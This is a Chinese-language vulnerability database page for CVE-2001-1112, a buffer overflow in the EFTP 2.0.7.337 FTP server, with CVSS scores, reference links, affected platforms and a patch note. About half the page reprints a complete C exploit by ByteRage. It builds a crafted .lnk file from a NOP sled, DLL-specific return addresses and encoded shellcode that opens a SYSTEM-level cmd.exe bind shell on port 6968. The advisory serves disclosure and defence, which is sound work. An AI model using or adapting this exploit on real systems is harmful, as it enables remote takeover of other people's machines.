CVE-2001-1112
CVSS7.5
发布时间 :2001-09-12 00:00:00
修订时间 :2008-09-05 16:25:43
NMCOES    

[原文]Buffer overflow in EFTP 2.0.7.337 allows remote attackers to execute arbitrary code by uploading a .lnk file containing a large number of characters.


[CNNVD]EFTP缓冲区溢出代码执行和服务拒绝漏洞(CNNVD-200109-045)

        EFTP 2.0.7.337版本存在缓冲区溢出漏洞。远程攻击者可以通过上传包含大量字符的a .lnk文件执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1112
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1112
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200109-045
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/7115.php
(VENDOR_ADVISORY)  XF  eftp-lnk-bo(7115)
http://www.securityfocus.com/bid/3330
(VENDOR_ADVISORY)  BID  3330
http://www.securityfocus.com/archive/1/213647
(VENDOR_ADVISORY)  BUGTRAQ  20010912 EFTP Version 2.0.7.337 vulnerabilities

- 漏洞信息

EFTP缓冲区溢出代码执行和服务拒绝漏洞
高危 缓冲区溢出
2001-09-12 00:00:00 2005-10-20 00:00:00
远程  
        EFTP 2.0.7.337版本存在缓冲区溢出漏洞。远程攻击者可以通过上传包含大量字符的a .lnk文件执行任意代码。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (21109)

EFTP 2.0.7 .337 Buffer Overflow Code Execution and Denial of Service Vulnerability (EDBID:21109)
windows remote
2001-09-12 Verified
0 byterage
N/A [点击下载]
source: http://www.securityfocus.com/bid/3330/info

Encrypted FTP (EFTP) is both an FTP client and server application for Windows platforms.

A malicious user with upload permissions to the target host can cause a buffer overflow in EFTP to execute code of the attacker's choosing. The attacker can potentially use this exploit to open a bindshell on the target host. Another possible result of this exploit is a denial of service. 

/***************************************************************
 * EFTP Version 2.0.7.337 remote exploit                       *
 *                                                             *
 * create spl0it.lnk                                           *
 * upload the file using the EFTP client                       *
 * (since I'm not planning to rewrite that blowfish crypto)    *
 * then issue an LS command on the server                      *
 *                                                             *
 * impact: SYSTEM level access CMD.EXE shell on port 6968      *
 *                                                             *
 * [ByteRage] <byterage@yahoo.com> http://www.byterage.cjb.net *
 ***************************************************************/

#include <stdio.h>

#define FileName "spl0it.lnk"

/* You should set the following three consts according
 * to the DLL you are basing the exploit upon, examples :
 *********************************************
 * DLL Name    : MSVCRT.DLL
 * Version     : v6.00.8797.0000
 * File Length : 278581 bytes
 * newEIP =             "\x1C\xDF\x01\x78" (*)
 * LoadLibraryRef       "\xD4\x10\x03\x78"
 * GetProcAddressRefADD "\xFC"
 *********************************************
 * DLL Name    : MSVCRT.DLL
 * Version     : v6.00.8397.0000
 * File Length : 266293 bytes
 * newEIP =             "\x55\xE4\x01\x78" (*)
 * LoadLibraryRef       "\xD4\xE0\x02\x78"
 * GetProcAddressRefADD "\xFC"
 *********************************************
 * (*) the new EIP must CALL/JMP/... either
 *     EAX or EBX
 */
const char * newEIP =        "\x55\xE4\x01\x78";
#define LoadLibraryRef       "\xD4\xE0\x02\x78"
#define GetProcAddressRefADD "\xFC"

/* The following 452b shellcode
 * spawns a cmd.exe shell on port 6968
 * and is a personal rewrite of
 * dark spyrit's original code
 */

/* ==== SHELLC0DE START ==== */

const char shellc0de[] =  

/* CODE: */
"\x8b\xf0\xac\x84\xc0\x75\xfb\x8b\xfe\x33\xc9\xb1\xc1\x4e\x80\x36"
"\x99\xe2\xfa\xbb"LoadLibraryRef"\x56\xff\x13\x95\xac\x84\xc0\x75"
"\xfb\x56\x55\xff\x53"GetProcAddressRefADD"\xab\xac\x84\xc0\x75\xfb\xac\x3c\x21\x74"
"\xe7\x72\x03\x4e\xeb\xeb\x33\xed\x55\x6a\x01\x6a\x02\xff\x57\xe8"
"\x93\x6a\x10\x56\x53\xff\x57\xec\x6a\x02\x53\xff\x57\xf0\x33\xc0"
"\x57\x50\xb0\x0c\xab\x58\xab\x40\xab\x5f\x55\x57\x56\xad\x56\xff"
"\x57\xc0\x55\x57\xad\x56\xad\x56\xff\x57\xc0\xb0\x44\x89\x07\x57"
"\xff\x57\xc4\x8b\x46\xf4\x89\x47\x3c\x89\x47\x40\xad\x89\x47\x38"
"\x33\xC0\x89\x47\x30\x66\xb8\x01\x01\x89\x47\x2c\x57\x57\x55\x55"
"\x55\x6a\x01\x55\x55\x56\x55\xff\x57\xc8\xff\x76\xf0\xff\x57\xcc"
"\xff\x76\xfc\xff\x57\xcc\x55\x55\x53\xff\x57\xf4\x93\x33\xc0\xb4"
"\x04\x50\x6a\x40\xff\x57\xd4\x96\x6a\x50\xff\x57\xe0\x8b\xcd\xb5"
"\x04\x55\x55\x57\x51\x56\xff\x77\xaf\xff\x57\xd0\x8b\x0f\xe3\x18"
"\x55\x57\x51\x56\xff\x77\xaf\xff\x57\xdc\x0b\xc0\x74\x21\x55\xff"
"\x37\x56\x53\xff\x57\xf8\xeb\xd0\x33\xc0\x50\xb4\x04\x50\x56\x53"
"\xff\x57\xfc\x55\x57\x50\x56\xff\x77\xb3\xff\x57\xd8\xeb\xb9\xff"
"\x57\xe4"

/* DATA: (XORed with 099) */
"\xd2\xdc\xcb\xd7\xdc\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9"
"\xf0\xe9\xfc\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7"
"\xff\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa\xfc\xea"
"\xea\xd8\x99\xda\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xc9"
"\xfc\xfc\xf2\xd7\xf8\xf4\xfc\xfd\xc9\xf0\xe9\xfc\x99\xde\xf5\xf6"
"\xfb\xf8\xf5\xd8\xf5\xf5\xf6\xfa\x99\xce\xeb\xf0\xed\xfc\xdf\xf0"
"\xf5\xfc\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc"
"\xe9\x99\xdc\xe1\xf0\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xb8\xce"
"\xca\xd6\xda\xd2\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb\xf0"
"\xf7\xfd\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed"
"\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\x99\x9b\x99\x82\xa1"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\xfa\xf4\xfd\x99"

"\x00";

/* ==== SHELLC0DE ENDS ==== */

;

int i;

FILE *file;

int main ()
{
  
  printf("EFTP Version 2.0.7.337 remote exploit by [ByteRage]\n");

  file = fopen(FileName, "w+b");
  if (!file) {
    printf("ERROR! Couldn't open "FileName" for output !\n");
    return 1;
  }
  
  for (i=0; i<1740; i++) { fwrite("\x90", 1, 1, file); }
  fwrite("\xEB\x06\x90\x90", 1, 4, file);  
  fwrite(newEIP, 1, 4, file); 
  fwrite(shellc0de, 1, sizeof(shellc0de)-1, file);

  fclose(file);

  printf(FileName" created! (Shellcode length: %i bytes)\n", sizeof(shellc0de));
  return 0;

}		

- 漏洞信息

764
EFTP .lnk File Handling Overflow
Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in EFTP. The server fails to sanitize input provided to the 'ls' command resulting in a buffer overflow. With a specially crafted .lnk file uploaded to the server, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2001-09-12 Unknow
2001-09-12 Unknow

- 解决方案

Upgrade to version 3.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

EFTP Buffer Overflow Code Execution and Denial of Service Vulnerability
Boundary Condition Error 3330
Yes No
2001-09-12 12:00:00 2009-07-11 07:56:00
This vulnerability was posted to BugTraq by ByteRage <byterage@yahoo.com>.

- 受影响的程序版本

Khamil Landross and Zack Jones EFTP 2.0.7 .337
+ Cisco iCDN 2.0
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0

- 漏洞讨论

Encrypted FTP (EFTP) is both an FTP client and server application for Windows platforms.

A malicious user with upload permissions to the target host can cause a buffer overflow in EFTP to execute code of the attacker's choosing. The attacker can potentially use this exploit to open a bindshell on the target host. Another possible result of this exploit is a denial of service.

- 漏洞利用

The following exploit code was provided by ByteRage &lt;byterage@yahoo.com&gt;

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站